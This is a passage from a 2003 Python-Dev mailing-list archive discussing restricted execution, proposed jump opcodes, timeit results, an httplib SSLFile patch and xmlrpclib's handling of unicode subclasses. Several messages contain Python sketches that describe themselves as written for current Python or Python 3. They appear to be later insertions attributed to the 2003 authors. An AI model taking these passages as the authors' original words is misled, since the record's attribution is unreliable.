might be possible to abstract things in some way to make that less 
widespread, but probably not without having an adverse impact on speed.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From guido@python.org  Mon Mar  3 14:40:40 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 03 Mar 2003 09:40:40 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: Your message of "Mon, 03 Mar 2003 13:42:43 GMT."
 <3E635BD3.9000107@algroup.co.uk>
References: <15930.48758.62473.425111@slothrop.zope.com> <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk>
Message-ID: <200303031440.h23Eeea16004@odiug.zope.com>

> I'm told that proxies actually rely on rexec, too. So, I guess whichever 
> approach you take, you need rexec.

Yes and no.  It's unclear what *you* mean when you say "rexec".  There
is a standard module by that name that employs Python's support for
tighter security and sets up an entire restricted execution
environment.  And then there's the underlying facilities in Python,
which allow you to override __import__ and all other built-ins; this
facility is often called "restricted execution."  Zope security
proxies rely on the latter facilities, but not on the rexec module.

I suggest that in order to avoid confusion, you should use "restricted
execution" when that's what you mean, and use "rexec" only to refer to
the standard module by that name.

> The problem is that although you can think about proxies as being like a 
> segmented architecture, you have to enforce that segmentation. And that 
> means doing so throughout the interpreter, doesn't it? I suppose it 
> might be possible to abstract things in some way to make that less 
> widespread, but probably not without having an adverse impact on speed.

The built-in restricted execution facilities indeed do distinguish
between two security domains: restricted and unrestricted.  In
restricted mode, certain introspection APIs are disallowed.
Restricted execution is enabled as soon as a particular global scope's
__builtins__ is not the standard __builtins__, which is by definition
the __dict__ of the __builtin__ module (note __builtin__, which is a
module, vs. __builtins__, which is a global).
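
The name-lookup half of this mechanism can be shown with a short
sketch. One loud assumption: the sketch is written for a current
Python, which no longer has the restricted mode described above, so
replacing __builtins__ only changes which built-in names the code can
see. It is not a security boundary there.

```python
# A global scope whose __builtins__ is a hand-picked dictionary
# instead of the standard one.
restricted_scope = {"__builtins__": {"len": len}, "name": "python"}

# Names present in the custom __builtins__ resolve as usual.
exec("result = len(name)", restricted_scope)

# Names left out of it are simply not found.
blocked = None
try:
    exec("open('somefile')", restricted_scope)
except NameError as exc:
    blocked = str(exc)
```

Here len is found through the substituted dictionary, while the lookup
of open fails with a NameError because the scope never falls back to
the standard built-ins.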

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ben@algroup.co.uk  Mon Mar  3 17:56:20 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 03 Mar 2003 17:56:20 +0000
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <200303031440.h23Eeea16004@odiug.zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com> <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain>              <3E635BD3.9000107@algroup.co.uk> <200303031440.h23Eeea16004@odiug.zope.com>
Message-ID: <3E639744.5050407@algroup.co.uk>

Guido van Rossum wrote:
>>I'm told that proxies actually rely on rexec, too. So, I guess whichever 
>>approach you take, you need rexec.
> 
> 
> Yes and no.  It's unclear what *you* mean when you say "rexec".  There
> is a standard module by that name that employs Python's support for
> tighter security and sets up an entire restricted execution
> environment.  And then there's the underlying facilities in Python,
> which allow you to override __import__ and all other built-ins; this
> facility is often called "restricted execution."  Zope security
> proxies rely on the latter facilities, but not on the rexec module.
> 
> I suggest that in order to avoid confusion, you should use "restricted
> execution" when that's what you mean, and use "rexec" only to refer to
> the standard module by that name.

OK, I mean restricted execution.

>>The problem is that although you can think about proxies as being like a 
>>segmented architecture, you have to enforce that segmentation. And that 
>>means doing so throughout the interpreter, doesn't it? I suppose it 
>>might be possible to abstract things in some way to make that less 
>>widespread, but probably not without having an adverse impact on speed.
> 
> 
> The built-in restricted execution facilities indeed do distinguish
> between two security domains: restricted and unrestricted.  In
> restricted mode, certain introspection APIs are disallowed.
> Restricted execution is enabled as soon as a particular global scope's
> __builtins__ is not the standard __builtins__, which is by definition
> the __dict__ of the __builtin__ module (note __builtin__, which is a
> module, vs. __builtins__, which is a global).

Oh, I understand that, but the complaint was that it is spread all over 
the interpreter. One of the nice things about hardware enforced 
segmentation is that you have a high assurance that it really is segmented.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From newsgroups1@bitfurnace.com  Mon Mar  3 23:55:47 2003
From: newsgroups1@bitfurnace.com (Damien Morton)
Date: Mon, 3 Mar 2003 18:55:47 -0500
Subject: [Python-Dev] JUMP_IF_X opcodes
Message-ID: <b40qcp$rsm$1@main.gmane.org>

I have been reviewing the compile.c module with respect to the use of
JUMP_IF_XXX opcodes, and the frequency with which these opcodes are followed
by a POP_TOP instruction.

It seems to me that there are two kinds of use cases for these opcodes:

The first use case could be expressed as POP_THEN_JUMP_IF_XXX
The second use case could be expressed as JUMP_IF_XXX_ELSE_POP

Listed below are the use cases for these instructions, and the functions in
compile.c that they appear in.

The form is JUMP_IF_XXX(top-of-stack-if-no-jump, top-of-stack-if-jump)


com_assert_stmt - JUMP_IF_TRUE(-,-)
com_if_stmt - JUMP_IF_FALSE(-,-)
com_while_stmt - JUMP_IF_FALSE(-,-)
com_try_except - JUMP_IF_FALSE(-,-)
com_list_if - JUMP_IF_FALSE(-, -)

com_comparison - JUMP_IF_FALSE(-, 0)
com_and_test - JUMP_IF_FALSE(-, 0)
com_test - JUMP_IF_TRUE(-, 1)

Below is a minimally intrusive implementation of the expansion of
JUMP_IF_FALSE into two opcodes for handling the two use cases.


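case JUMP_IF_FALSE_ELSE_POP:
case POP_THEN_JUMP_IF_FALSE:
    NEXTARG(oparg);
    err = PyObject_IsTrue(TOP());
    if (err > 0) {
        /* true: discard the tested value and fall through */
        err = 0;
        POP();
    }
    else if (err == 0) {
        /* false: only the POP_THEN variant discards the value before jumping */
        if (opcode == POP_THEN_JUMP_IF_FALSE) POP();
        JUMPBY(oparg);
    }
    else
        break;    /* PyObject_IsTrue() reported an error */
    continue;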
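
For readers who prefer to see the stack effect outside of ceval.c, the two proposed opcodes can be modelled in a few lines of Python. This is only a sketch: the function names mirror the proposed opcode names, and the program counter here is a plain instruction index rather than a byte offset, which is an assumption made for brevity.

```python
def jump_if_false_else_pop(stack, pc, target):
    """Jump and keep the false value on the stack; otherwise pop it and fall through."""
    if stack[-1]:
        stack.pop()
        return pc + 1
    return target


def pop_then_jump_if_false(stack, pc, target):
    """Always pop the tested value, then jump only if it was false."""
    value = stack.pop()
    return pc + 1 if value else target


# 'a and b' style: a false operand must survive as the result of the expression.
stack = [0]
print(jump_if_false_else_pop(stack, 0, 5), stack)

# 'if a:' style: the tested value is never needed again.
stack = [0]
print(pop_then_jump_if_false(stack, 0, 5), stack)
```

The first form fits com_and_test and friends, where the value left behind is the expression's result; the second fits statements such as if and while, where the value is discarded on both paths.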


Comments, suggestions, etc, appreciated.


From dave@boost-consulting.com  Tue Mar  4 00:29:58 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Mon, 03 Mar 2003 19:29:58 -0500
Subject: [Python-Dev] Re: __slots__ for metatypes
References: <3E627260.5050807@tismer.com>
Message-ID: <uadgcnfcp.fsf@boost-consulting.com>

Christian Tismer <tismer@tismer.com> writes:

> This small patch also gives lots of flexibility to people,
> who like to add extra stuff to their dynamic type objects.
> (Well, I do this frequently)
>
> It would be nice if we could add this small feature, soon.
>
> http://www.python.org/sf/696193

Yes, please, if possible.

-Dave
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From neal@metaslash.com  Tue Mar  4 02:56:26 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 03 Mar 2003 21:56:26 -0500
Subject: [Python-Dev] JUMP_IF_X opcodes
In-Reply-To: <b40qcp$rsm$1@main.gmane.org>
References: <b40qcp$rsm$1@main.gmane.org>
Message-ID: <20030304025626.GA24615@epoch.metaslash.com>

On Mon, Mar 03, 2003 at 06:55:47PM -0500, Damien Morton wrote:
> I have been reviewing the compile.c module with respect to the use of
> JUMP_IF_XXX opcodes, and the frequency with which these opcodes are followed
> by a POP_TOP instruction.
> 
> It seems to me that there are two kinds of uses cases for these opcodes,
> 
> The first use case could be expressed as POP_THEN_JUMP_IF_XXXX
> The second use case could be expressed as JUMP_IF_XXX_ELSE_POP
> 
> Comments, suggestions, etc, appreciated.

I think you won't get much of a benefit by adding the 2+ instructions
necessary for this scheme.  I think it would be best to have
JUMP_IF_XXX always do a POP_TOP and never jump to a jump.  Below is an
example of some code and the disassembly.

        >>> def f(a, b):
        ...   if a and b:
        ...     print 'no'
        ... 
        >>> dis.dis(f)
          2           0 LOAD_FAST                0 (a)
                      3 JUMP_IF_FALSE            4 (to 10)
                      6 POP_TOP             
                      7 LOAD_FAST                1 (b)
                >>   10 JUMP_IF_FALSE            9 (to 22)
                     13 POP_TOP             

          3          14 LOAD_CONST               1 ('no')
                     17 PRINT_ITEM          
                     18 PRINT_NEWLINE       
                     19 JUMP_FORWARD             1 (to 23)
                >>   22 POP_TOP             
                >>   23 LOAD_CONST               0 (None)
                     26 RETURN_VALUE        


Note the first JUMP_IF_FALSE jumps to the second JUMP_IF_FALSE which
then jumps to POP_TOP.  An optimized version of this code where the
POP is performed as part of the JUMP_IF_XXX could be:

        >>> dis.dis(f)
          2           0 LOAD_FAST                0 (a)
                      3 JUMP_IF_FALSE           11 (to 17)
                      6 LOAD_FAST                1 (b)
                      9 JUMP_IF_FALSE            5 (to 17)

          3          12 LOAD_CONST               1 ('no')
                     15 PRINT_ITEM          
                     16 PRINT_NEWLINE       
                >>   17 LOAD_CONST               0 (None)
                     20 RETURN_VALUE        

In the optimized version, there are at least 2 fewer iterations around
the eval_frame loop (when a is false): 1 POP_TOP, 1 JUMP_IF_FALSE.
If both a and b are true, the if body is executed and there are 3
fewer iterations: 2 POP_TOPs, 1 JUMP_FORWARD.  With more conditions,
the savings should be better.
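
The counts above can be checked with a toy interpreter that walks the two listings and counts trips around the loop. This is a sketch only: count_dispatches, ORIGINAL and OPTIMIZED are names invented here, jump arguments are stored as the absolute "(to N)" targets rather than relative offsets, and the print opcodes just pop instead of printing.

```python
def count_dispatches(code, env, pop_on_test):
    """Count loop iterations for a tiny subset of the bytecode shown above.

    code maps byte offset -> (opname, argument, size in bytes).
    pop_on_test=True models a JUMP_IF_FALSE that pops the tested value itself.
    """
    stack, pc, count = [], 0, 0
    while True:
        op, arg, size = code[pc]
        count += 1
        pc += size
        if op == "LOAD_FAST":
            stack.append(env[arg])
        elif op == "LOAD_CONST":
            stack.append(arg)
        elif op in ("POP_TOP", "PRINT_ITEM"):
            stack.pop()
        elif op == "JUMP_IF_FALSE":
            value = stack.pop() if pop_on_test else stack[-1]
            if not value:
                pc = arg
        elif op == "JUMP_FORWARD":
            pc = arg
        elif op == "RETURN_VALUE":
            return count
        # PRINT_NEWLINE has no stack effect in this model.


ORIGINAL = {
    0: ("LOAD_FAST", "a", 3), 3: ("JUMP_IF_FALSE", 10, 3),
    6: ("POP_TOP", None, 1), 7: ("LOAD_FAST", "b", 3),
    10: ("JUMP_IF_FALSE", 22, 3), 13: ("POP_TOP", None, 1),
    14: ("LOAD_CONST", "no", 3), 17: ("PRINT_ITEM", None, 1),
    18: ("PRINT_NEWLINE", None, 1), 19: ("JUMP_FORWARD", 23, 3),
    22: ("POP_TOP", None, 1), 23: ("LOAD_CONST", None, 3),
    26: ("RETURN_VALUE", None, 1),
}

OPTIMIZED = {
    0: ("LOAD_FAST", "a", 3), 3: ("JUMP_IF_FALSE", 17, 3),
    6: ("LOAD_FAST", "b", 3), 9: ("JUMP_IF_FALSE", 17, 3),
    12: ("LOAD_CONST", "no", 3), 15: ("PRINT_ITEM", None, 1),
    16: ("PRINT_NEWLINE", None, 1), 17: ("LOAD_CONST", None, 3),
    20: ("RETURN_VALUE", None, 1),
}

for a, b in [(False, False), (True, False), (True, True)]:
    env = {"a": a, "b": b}
    before = count_dispatches(ORIGINAL, env, pop_on_test=False)
    after = count_dispatches(OPTIMIZED, env, pop_on_test=True)
    print(a, b, before, after, before - after)
```

Counting dispatches says nothing about wall-clock time, of course; it only confirms the bookkeeping of which instructions disappear.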

The problem is that it's difficult to get the compiler to output this
code AFAIK.  I believe Skip's peephole optimizer did the
transformation to prevent a jump to a jump, but that was another pass.
The new compiler Jeremy is working on should make these sorts of
transformations easier.

All that said, the scheme you propose could provide a decent speed up.
The only way to know is to try. :-)

Neal


From guido@python.org  Thu Mar  6 03:55:27 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 05 Mar 2003 22:55:27 -0500
Subject: [Python-Dev] Fun with timeit.py
Message-ID: <200303060355.h263tRv28259@pcp02138704pcs.reston01.va.comcast.net>

At Jim's request, I added a utility module to the standard library
that implements state-of-the-art timing of code snippets.

Using a slightly modified version of this code, here's the cost in
microseconds of one for loop iteration (with 'pass' as the loop body)
in various Python versions.  All tests were run on my home machine: a
664 MHz Pentium III with 256 KB cache, running Red Hat Linux 7.3,
compiled with gcc 2.96.  Note the steady improvement over the
years. :-)

    version plain   -O
    ------- -----   -----
    1.3     0.625   n/a
    1.4     0.602   n/a
    1.5.2   0.606   0.466
    2.0     0.561   0.445
    2.1     0.591   0.436
    2.2     0.416   0.277
    2.3a2+  0.246   0.248 (1)

The invocation was "python timeit.py -r5" (with -O added for the last
column).  This times 5 runs of a million iterations each and prints
the time (normalized to usec per iteration) for the fastest run.  I
ran this twice for each combination and picked the lowest of the two;
there was never more than 0.002 usec difference.
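
The same procedure (several runs, keep the fastest, normalize to usec per iteration) can be sketched with the module's Timer class as it exists in current Python. The helper name usec_per_iteration is made up for this example, and timing a bare 'pass' statement is only an approximation of the modified script used for the table.

```python
import timeit


def usec_per_iteration(stmt="pass", setup="pass", repeat=5, number=1000000):
    """Time `repeat` runs of `number` iterations; report the fastest in usec/iteration."""
    timer = timeit.Timer(stmt, setup)
    best = min(timer.repeat(repeat=repeat, number=number))
    return best * 1e6 / number


print("%.3f usec per iteration" % usec_per_iteration())
```

Taking the minimum rather than the mean is deliberate: slower runs mostly measure interference from other processes, not the code under test.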

(1) A mystery: the Python 2.3 binary installed in /usr/local/bin
measured 0.266 for the -O case, but 0.248 without -O; i.e. -O made it
slower!  The byte-for-byte identical binary in my build tree produced
the more reasonable measurements given in the table.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From brett@python.org  Thu Mar  6 06:46:28 2003
From: brett@python.org (Brett Cannon)
Date: Wed, 5 Mar 2003 22:46:28 -0800 (PST)
Subject: [Python-Dev] Pre-PyCon sprint ideas
Message-ID: <Pine.SOL.4.53.0303052240090.4109@death.OCF.Berkeley.EDU>

In an effort to help Guido (did you get my email about the rough draft of
the email to send out to the rest of the world?) I am trying to gather
ideas for what the Python core sprint can focus on.  I have set up a wiki
page at http://www.python.org/cgi-bin/moinmoin/PyCoreSprint for people to
add ideas to.  If there is something you think deserves sprint attention
then go add it.

-Brett


From python@rcn.com  Thu Mar  6 11:12:54 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 6 Mar 2003 06:12:54 -0500
Subject: [Python-Dev] More Zen
Message-ID: <000f01c2e3d1$561b60a0$125ffea9@oemcomputer>

Iterators unified access to containers -- let's find more of those.
Substitutability simplifies development 
    so shelves have a full dictionary interface
    but tuples won't sprout a count method
    because lists differ in intent.
Deprecation comes at a price but cruft has a cost of its own.
Holistic refactoring beats piecemeal optimization.
Comment generously, the best modules are an education to read.
Be kind on the Usenet some posters are only eleven.


Raymond Hettinger


From mwh@python.net  Thu Mar  6 11:36:58 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 06 Mar 2003 11:36:58 +0000
Subject: [Python-Dev] More Zen
In-Reply-To: <000f01c2e3d1$561b60a0$125ffea9@oemcomputer> ("Raymond
 Hettinger"'s message of "Thu, 6 Mar 2003 06:12:54 -0500")
References: <000f01c2e3d1$561b60a0$125ffea9@oemcomputer>
Message-ID: <2mk7fc20bp.fsf@starship.python.net>

"Raymond Hettinger" <raymond.hettinger@verizon.net> writes:

[snip stuff I agree with]

> Comment generously, the best modules are an education to read.

This one I have mild issues with.  Ideally, your code is so clear that
it requires no comments to read!  And information for users of the
code should be in docstrings.  If you're implementing a non-obvious
algorithm then there's a place for a comment block educating the
reader how it works, but I'm leery of anything that might seem to
encourage the

    i = i + 1 # add one to i

school of commenting.

Cheers,
M.

-- 
  Our lecture theatre has just crashed. It will currently only
  silently display an unexplained line-drawing of a large dog
  accompanied by spookily flickering lights.
     -- Dan Sheppard, ucam.chat (from Owen Dunn's summary of the year)


From mchermside@ingdirect.com  Thu Mar  6 13:09:56 2003
From: mchermside@ingdirect.com (Chermside, Michael)
Date: Thu, 6 Mar 2003 08:09:56 -0500
Subject: [Python-Dev] Re: More Zen
Message-ID: <7F171EB5E155544CAC4035F0182093F03CF76E@INGDEXCHSANC1.ingdirect.com>

Raymond:

I particularly like your last zen point:

> Be kind on the Usenet some posters are only eleven.

I like it for two reasons... one, being that it's an important
truth (as recently illustrated ;-)), but secondly that it
reminds us that Python is more than a language... it also
includes a very strong and helpful community without which
all the design principles in the world would never lead to
such a successful language.

-- Michael Chermside


From jacobs@penguin.theopalgroup.com  Thu Mar  6 15:18:48 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Thu, 6 Mar 2003 10:18:48 -0500 (EST)
Subject: [Python-Dev] httplib SSLFile broken in CVS
Message-ID: <Pine.LNX.4.44.0303060913160.2595-100000@penguin.theopalgroup.com>

Hi all,

SourceForge isn't letting me in, so I'm dropping a note here to report that
Raymond Hettinger's changes to httplib.py (Rev 1.72 on Wed Feb 26 22:45:18
2003 UTC) have broken the read() method on the SSLFile object.  I suspect
that he was trying to be clever by adding iterators to code that worked just
fine (if not better) without them.  Unfortunately, clever code has to be
tested.  The diff below repairs it, though I'd be just as happy if that part
of Rev 1.72 was reverted.

--- httplib.py.orig     2003-03-05 19:37:28.000000000 -0500
+++ httplib.py  2003-03-06 10:11:01.000000000 -0500
@@ -864,13 +864,15 @@

     def read(self, size=None):
         L = [self._buf]
+        self._buf = ''
         if size is None:
-            self._buf = ''
             for s in iter(self._read, ""):
                 L.append(s)
-            return "".join(L)
         else:
-            avail = len(self._buf)
+            avail = len(L[0])
+            if avail >= size:
+                self._buf = L[0][size:]
+                return L[0][:size]
             for s in iter(self._read, ""):
                 L.append(s)
                 avail += len(s)
@@ -878,14 +880,19 @@
                     all = "".join(L)
                     self._buf = all[size:]
                     return all[:size]
+        return "".join(L)

     def readline(self):
         L = [self._buf]
         self._buf = ''
+        i = L[0].find("\n") + 1
+        if i > 0:
+            self._buf = L[0][i:]
+            return L[0][:i]
         for s in iter(self._read, ""):
             L.append(s)
-            if "\n" in s:
-                i = s.find("\n") + 1
+            i = s.find("\n") + 1
+            if i > 0:
                 self._buf = s[i:]
                 L[-1] = s[:i]
                 break
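
To make the intent of the patch easier to follow outside of diff form, here is a self-contained sketch of the patched buffering logic, written for current Python 3 with str chunks. ChunkReader is a hypothetical stand-in for SSLFile, and its _read() pulls from a list of chunks instead of an SSL connection; only the read()/readline() logic follows the patch.

```python
class ChunkReader:
    """Hypothetical stand-in for SSLFile: buffers chunks from a raw source."""

    def __init__(self, chunks):
        self._chunks = iter(chunks)
        self._buf = ""

    def _read(self):
        # Returns "" once the source is exhausted, like a closed connection.
        return next(self._chunks, "")

    def read(self, size=None):
        parts = [self._buf]
        self._buf = ""
        if size is None:
            for s in iter(self._read, ""):
                parts.append(s)
        else:
            avail = len(parts[0])
            if avail >= size:
                # Enough data is already buffered; do not touch the source.
                self._buf = parts[0][size:]
                return parts[0][:size]
            for s in iter(self._read, ""):
                parts.append(s)
                avail += len(s)
                if avail >= size:
                    data = "".join(parts)
                    self._buf = data[size:]
                    return data[:size]
        # End of stream: return whatever was collected.
        return "".join(parts)

    def readline(self):
        parts = [self._buf]
        self._buf = ""
        i = parts[0].find("\n") + 1
        if i > 0:
            # A complete line is already sitting in the buffer.
            self._buf = parts[0][i:]
            return parts[0][:i]
        for s in iter(self._read, ""):
            parts.append(s)
            i = s.find("\n") + 1
            if i > 0:
                self._buf = s[i:]
                parts[-1] = s[:i]
                break
        return "".join(parts)


reader = ChunkReader(["ab", "c\nde", "f"])
print(repr(reader.readline()))
print(repr(reader.read(1)))
print(repr(reader.read()))
```

The two cases the patch adds are the early returns: a request that the leftover buffer can already satisfy, and a sized read that hits end of stream before size bytes arrive.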

Regards,
-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From python@rcn.com  Thu Mar  6 15:33:21 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 6 Mar 2003 10:33:21 -0500
Subject: [Python-Dev] httplib SSLFile broken in CVS
References: <Pine.LNX.4.44.0303060913160.2595-100000@penguin.theopalgroup.com>
Message-ID: <002301c2e3f5$b84641e0$5c10a044@oemcomputer>

I'll put in your SF report and fix it.

Raymond



From jacobs@penguin.theopalgroup.com  Thu Mar  6 15:40:10 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Thu, 6 Mar 2003 10:40:10 -0500 (EST)
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <002301c2e3f5$b84641e0$5c10a044@oemcomputer>
Message-ID: <Pine.LNX.4.44.0303061037240.2595-100000@penguin.theopalgroup.com>

On Thu, 6 Mar 2003, Raymond Hettinger wrote:
> I'll put in your SF report and fix it.

Thanks.  Let me know if you'd like me to test any additional changes, since
I have a large test suite for my applications that uses httplib+SSL
extensively.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From python@rcn.com  Thu Mar  6 15:52:22 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 6 Mar 2003 10:52:22 -0500
Subject: [Python-Dev] More Zen
References: <000f01c2e3d1$561b60a0$125ffea9@oemcomputer> <2mk7fc20bp.fsf@starship.python.net>
Message-ID: <003101c2e3f8$60cdf4a0$5c10a044@oemcomputer>

From: "Michael Hudson" <mwh@python.net>
> > Comment generously, the best modules are an education to read.
> 
> This one I have mild issues with.  Ideally, your code is so clear that
> it requires no comments to read!  And information for users of the
> code should be in docstrings.  If you're implementing a non-obvious
> algorithm then there's a place for a comment block educating the
> reader how it works, but I'm leery of anything that might seem to
> encourage the  "i = i + 1 # add one to i"

This ought to be more clear:

   Reading heapq and timeit makes you smart -- let's comment like that.
 

Raymond Hettinger


From neal@metaslash.com  Thu Mar  6 15:57:06 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Thu, 06 Mar 2003 10:57:06 -0500
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <Pine.LNX.4.44.0303061037240.2595-100000@penguin.theopalgroup.com>
References: <002301c2e3f5$b84641e0$5c10a044@oemcomputer>
 <Pine.LNX.4.44.0303061037240.2595-100000@penguin.theopalgroup.com>
Message-ID: <20030306155706.GE1093@epoch.metaslash.com>

On Thu, Mar 06, 2003 at 10:40:10AM -0500, Kevin Jacobs wrote:
> 
> Thanks.  Let me know if you'd like me to test any additional changes, since
> I have a large test suite for my applications that uses httplib+SSL
> extensively.

Kevin,

Any chance we could get you to augment the regression tests?
It would be very helpful.

Neal


From bbum@codefab.com  Thu Mar  6 14:51:55 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Thu, 6 Mar 2003 09:51:55 -0500
Subject: [Python-Dev] xmlrpclib
Message-ID: <2C8338BE-4FE3-11D7-AD53-000393877AE4@codefab.com>

Is there active work on the xmlrpclib module these days?   The 
HTTPTransport patch/addition should likely go out with 2.3 as it adds 
easy authentication and proxy support to xmlrpclib.

Also, the unicode support in xmlrpclib is broken in that it can't 
handle subclasses of <type 'unicode'>.

b.bum


From jacobs@penguin.theopalgroup.com  Thu Mar  6 16:49:18 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Thu, 6 Mar 2003 11:49:18 -0500 (EST)
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <20030306155706.GE1093@epoch.metaslash.com>
Message-ID: <Pine.LNX.4.44.0303061120260.2595-100000@penguin.theopalgroup.com>

On Thu, 6 Mar 2003, Neal Norwitz wrote:
> On Thu, Mar 06, 2003 at 10:40:10AM -0500, Kevin Jacobs wrote:
> > Thanks.  Let me know if you'd like me to test any additional changes, since
> > I have a large test suite for my applications that uses httplib+SSL
> > extensively.
>
> Any chance we could get you to augment the regression tests?
> It would be very helpful.

How many people run the regression suite with 'network' enabled?  If nobody
does, then it will be a waste of time to add it.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From skip@pobox.com  Thu Mar  6 16:50:48 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 6 Mar 2003 10:50:48 -0600
Subject: [Python-Dev] xmlrpclib
In-Reply-To: <2C8338BE-4FE3-11D7-AD53-000393877AE4@codefab.com>
References: <2C8338BE-4FE3-11D7-AD53-000393877AE4@codefab.com>
Message-ID: <15975.31848.141376.614323@montanaro.dyndns.org>

    Bill> Is there active work on the xmlrpclib module these days?  The
    Bill> HTTPTransport patch/addition should likely go out with 2.3 as it
    Bill> adds easy authentication and proxy support to xmlrpclib.

Can you provide a SF id?  I can't seem to find it.

    Bill> Also, the unicode support in xmlrpclib is broken in that it can't 
    Bill> handle subclasses of <type 'unicode'>.

Does it handle subclasses of str?

Skip


From python@rcn.com  Thu Mar  6 16:55:57 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 6 Mar 2003 11:55:57 -0500
Subject: [Python-Dev] httplib SSLFile broken in CVS
References: <Pine.LNX.4.44.0303061120260.2595-100000@penguin.theopalgroup.com>
Message-ID: <009701c2e401$4287ee20$5c10a044@oemcomputer>

> How many people run the regression suite with 'network' enabled?  If nobody
> does, then it will be a waste of time to add it.

I *always* run the suite with network enabled and it only
takes one person running a suite to detect an error.
Also, everyone who makes a change to a network resource
should be running the tests with network enabled (at least
for that particular change).

IOW, it is definitely not a waste of time.


Raymond Hettinger



From bbum@codefab.com  Thu Mar  6 17:10:42 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Thu, 6 Mar 2003 12:10:42 -0500
Subject: [Python-Dev] xmlrpclib
In-Reply-To: <15975.31848.141376.614323@montanaro.dyndns.org>
Message-ID: <8FEDD9EF-4FF6-11D7-AD53-000393877AE4@codefab.com>

On Thursday, Mar 6, 2003, at 11:50 US/Eastern, Skip Montanaro wrote:
>     Bill> Is there active work on the xmlrpclib module these days?  The
>     Bill> HTTPTransport patch/addition should likely go out with 2.3 as it
>     Bill> adds easy authentication and proxy support to xmlrpclib.
>
> Can you provide a SF id?  I can't seem to find it.

It had been closed or moved out of the SF bug queue by Fred about the 
same time he left python-dev, I believe.     I had sent the 
HTTPTransport source to Fred, but that sounds like a dead end these 
days.

Found it: 648658

>     Bill> Also, the unicode support in xmlrpclib is broken in that it can't
>     Bill> handle subclasses of <type 'unicode'>.
>
> Does it handle subclasses of str?

I haven't tested, but looking at the implementation, I don't think it 
will.

In my case, I'm using xmlrpclib in the context of a Cocoa/Python based 
application that frequently uses Objective-C sourced strings as a part 
of the RPC request.  The PyObjC bridge now bridges NSStrings as a 
subclass of unicode.

Currently, the Marshaller class in xmlrpclib builds a simple dictionary 
of types used to encode raw objects to XML.

class Marshaller:
    ...
    dispatch = {}
    ...
    def dump_string(self, value, escape=escape):
        self.write("<value><string>%s</string></value>\n" % escape(value))
    dispatch[StringType] = dump_string
    if unicode:
        def dump_unicode(self, value, escape=escape):
            value = value.encode(self.encoding)
            self.write("<value><string>%s</string></value>\n" % escape(value))
        dispatch[UnicodeType] = dump_unicode
    ...

Where the dump method is:

     def __dump(self, value):
         try:
             f = self.dispatch[type(value)]
         except KeyError:
             raise TypeError, "cannot marshal %s objects" % type(value)
         else:
             f(self, value)

So, no, it doesn't do subclasses properly.  The workaround [for me] was 
easy... and bogus:

import xmlrpclib
xmlrpclib.Marshaller.dispatch[type(NSString.stringWithString_(''))] = \
    xmlrpclib.Marshaller.dispatch[type(u'')]

b.bum


From jacobs@penguin.theopalgroup.com  Thu Mar  6 17:10:52 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Thu, 6 Mar 2003 12:10:52 -0500 (EST)
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <009701c2e401$4287ee20$5c10a044@oemcomputer>
Message-ID: <Pine.LNX.4.44.0303061205250.2595-100000@penguin.theopalgroup.com>

On Thu, 6 Mar 2003, Raymond Hettinger wrote:
> > How many people run the regression suite with 'network' enabled?  If nobody
> > does, then it will be a waste of time to add it.
> 
> IOW, it is definitely not a waste of time.

Great!  (Until today I didn't even know how to enable the network resource)

I'll submit a patch to test_socket_ssl, since it is already using urllib.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From klm@zope.com  Thu Mar  6 17:15:09 2003
From: klm@zope.com (Ken Manheimer)
Date: Thu, 6 Mar 2003 12:15:09 -0500 (EST)
Subject: [Python-Dev] More Zen
